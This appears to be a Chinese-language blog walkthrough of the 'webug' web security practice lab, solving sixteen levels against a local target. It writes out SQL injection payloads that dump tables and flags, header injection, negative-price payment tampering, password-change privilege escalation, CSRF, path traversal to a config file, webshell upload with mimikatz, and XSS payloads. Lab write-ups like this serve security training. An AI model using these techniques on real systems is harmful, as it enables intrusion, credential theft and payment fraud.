webug通关攻略
第一关 很简单的get注入
加引号,报错。需要闭合单引号来注入。
could not to the database You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ’‘1’’' at line 1
注入过程:
- ordey by 5
- %23报错
- ordey by 4 %23返回正常列表
- union select database(),2,3,4 %23 爆出数据库 pentesterlab
- union select group_concat(table_name),2,3,4 from information_schema.tables where table_schema=database() %23 爆出表 comment,flag,goods,user
- union select group_concat(column_name),2,3,4 from information_schema.columns where table_name= ‘flag’ %23 爆出列id,flag
- union select flag,2,3,4 from flag %23 查看flag值204f704fbbcf6acf398ffee11989b377
第二关 从图片中找到有用的信息
这题 只能找到 123.txt 密码123,然后就。。。。。。。题有问题吧
第三关 渗透网站的时候目录也很重要
可以拿御剑扫描目录
也可以自己翻一翻目录
1.http://10.10.10.144/pentest/test/san/index33.htm 进入的页面
2.http://10.10.10.144/pentest/test/san 上一级目录,里面有3个目录
3.http://10.10.10.144/pentest/test/san/test/ 看test目录,让把目录用MD5加密,test加密过后为 4621d373cade4e83 后另外一个目录一样。
4.http://10.10.10.144/pentest/test/san/4621d373cade4e83/ 得到 flag{人人都知道站长是个大帅比}
第四关 当遇到五位验证码的时候可以爆破
题目说5位验证码,
直接用burp爆破,得到密码 admin123
第五关 头部的一个注入
头部注入想到了XFF头,用burp抓包,然后加X-forwarded-For: ’ 报错了:你改变了浏览器发送的数据,并输入了 ’ could not to the database You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘’’ at line 1
剩下的和第一关一样了。。。
爆出 flag 204f704fbbcf6acf398ffee11989b377
推荐火狐的一个插件 SIMPLE MODIFY HEADERS 可以修改http头。
第六关 支付问题:用最少的钱去购买到一本书!
账号密码是第7关的,看题目意思,不花钱的就是最少了,用burp抓包试试,发现了书的钱是post上传的,bill1=10&bill2=20&num1=2&num2=1&uid=1,那么我就把书的价格改成0,发现买书能够成功。
后面又发现第一本书可以输入-2和第二本书输入1后面的价格抵消。。。
第七关 越权
进入里面,只有一个修改密码,题目越权,就先看了一下cookie,发现什么东西都没有嘛,然后点修改密码,发现url: ?name=tom,这不是可以修改别人的密码嘛,试一试修改admin,发现修改成功了。但是登陆不了admin,,,抓包看看***username=tom&password1=123456789&password2=123456789&password3=123456789***发现这样改密码,把tom改成admin,后面admin登陆成功。
第八关 csrf 管理员每天晚上10点上线
进去后还是只有一个更改密码的界面。用burp拦截更改密码页面,可以用burp一键生成csrf poc,保存为html文件,管理员打开就被修改密码了,完成了csrf
第九关 url跳转 你能跳转到百度页面吗?
按下f12会发现 < a href=“index.php?url=#” >I< /a >
这就是url跳转,直接http://10.10.10.144/pentest/test/5/index.php?url=http://www.baidu.com这样就跳转到百度页面了
第十关 文件下载
not found
第十一关
标题是帮管理员找回密码。
然后抓包试试,发现
pic=dog_cat.jpg&submit=%E4%B8%8B%E8%BD%BD
pic能改文件路径。构造这样的就能得到密码。
pic=…/…/…/pentest/test/7/1/db/config.php&submit=%E4%B8%8B%E8%BD%BD
第十二关 我忘记了系统密码
有上传,没有任何和过滤,直接上传一句话,拿菜刀连接,题目说是密码在D盘,但是D盘什么都没有。
上win密码抓取神器mimikatz。但是我上传成功了,输入命令没有回显。很蛋疼。。。直接拿靶机跑,也报错了,未能抓取密码,尴尬。。。后面百度原来用管理员权限运行就可以使用。
还得继续学习?。
第十三关 XSS
进入有个666,我点了一下发现url,就试了一试xss,然后可以
http://10.10.10.144/pentest/test/9/?id=<script>alert("xss")</script>
第十四关 储存型xss
有个留言,果然储存型xss,无任何过滤,直接 <script>alert(111)</script>
第十五关 图片上传不了
先上传php,不是图片上传不了,上传图片,发现上传不成功,又上传图片,抓包把其后缀改为php就能上传了。
第十六关 明天双十一
知名网站瞬间想到了www.taobao.com*** ,但是只能10.10.10.10访问,修改xff也没用,只好修改host,弹出nono,郁闷。。。看源码,需要把 Referer: www.topsec.com.cn 这个修改了就好了。
flag:83242lkjKJ(&^&k0 但是不对,我也搞不懂。只好看源码,需要MD5加密
源码
if(isset($_POST["flag"]))
{
$flag=$_POST["flag"];
$flag = mysql_real_escape_string($flag);//防止SQL注入
if(md5("263b4b51e98a64e8af1a95f8c60ad3aa")==md5($flag)){
echo "<font color='green'>success,请记录您的flag</font>";
}else{
echo "<font color='red'>加油努力,快去剁手</font>";
}
}else{
$url=$_REQUEST['url'];
if($url!=null||$url!=""){
if(strstr($url,"www.taobao.com")){
if($_SERVER['HTTP_HOST']=="10.10.10.10"){
if(strstr($_SERVER['HTTP_REFERER'],"www.topsec.com.cn")){
if(strstr($_SERVER['HTTP_REFERER'],"www.topsec.com.cn")){
echo "剁手了,请记录截图!!!flag:83242lkjKJ(*&*^*&k0"."<br/>";
}else{
echo "不想剁手了"."<br/>";
}
}else{
echo "nono"."<br/>";
}
}else{
echo "哎呀,这里只允许10.10.10.10访问!!!"."<br/>";
}
}else{
echo "这个地方剁手不好,换个地方!";
}
}
}
6242
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
